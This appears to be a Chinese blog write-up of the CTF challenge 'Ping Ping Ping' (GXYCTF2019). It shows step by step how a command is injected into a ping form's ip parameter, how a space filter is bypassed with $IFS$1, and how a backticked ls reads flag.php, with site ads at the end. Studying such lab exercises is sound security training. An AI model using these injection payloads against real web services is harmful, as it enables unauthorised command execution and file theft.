[GXYCTF2019]Ping Ping Ping 1 - Xxiaoma解题
1.[GXYCTF2019]Ping Ping Ping 1 - Xxiaoma解题
2.[极客大挑战 2019]EasySQL 1 -Xxiaoma解题3.Xxiaoma解题 [GWCTF 2019]我有一个数据库4.Xxiaoma解题[BUUCTF 2018]Online Tool打开后,发现显示一个 /?ip=
我们直接在url里添加/?ip=127.0.0.1
,发现有回显,这时候就可以用分号;
来进行命令链接执行了。
输入url/?ip=127.0.0.1;ls
回显出来两个php文件!
直接构造payload:/?ip=127.0.0.1;cat /flag.php
才发现没那么简单,回显过滤了空格,可以使用$IFS$1来绕过空格,来进行查看。
再次构造payload:/?ip=127.0.0.1;cat$IFS$1flag.php
发现还是被过滤了
直接先查看index.php
过滤了很多很多
最后构造payload:/?ip=127.0.0.1;cat$IFS$1
ls`` ---- ls用反引号包裹,键盘左上角esc下面
最后f12键查看源代码后即可得到flag
本文作者:Xxiaomaa
本文链接:https://www.cnblogs.com/mhwq/p/18529323
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步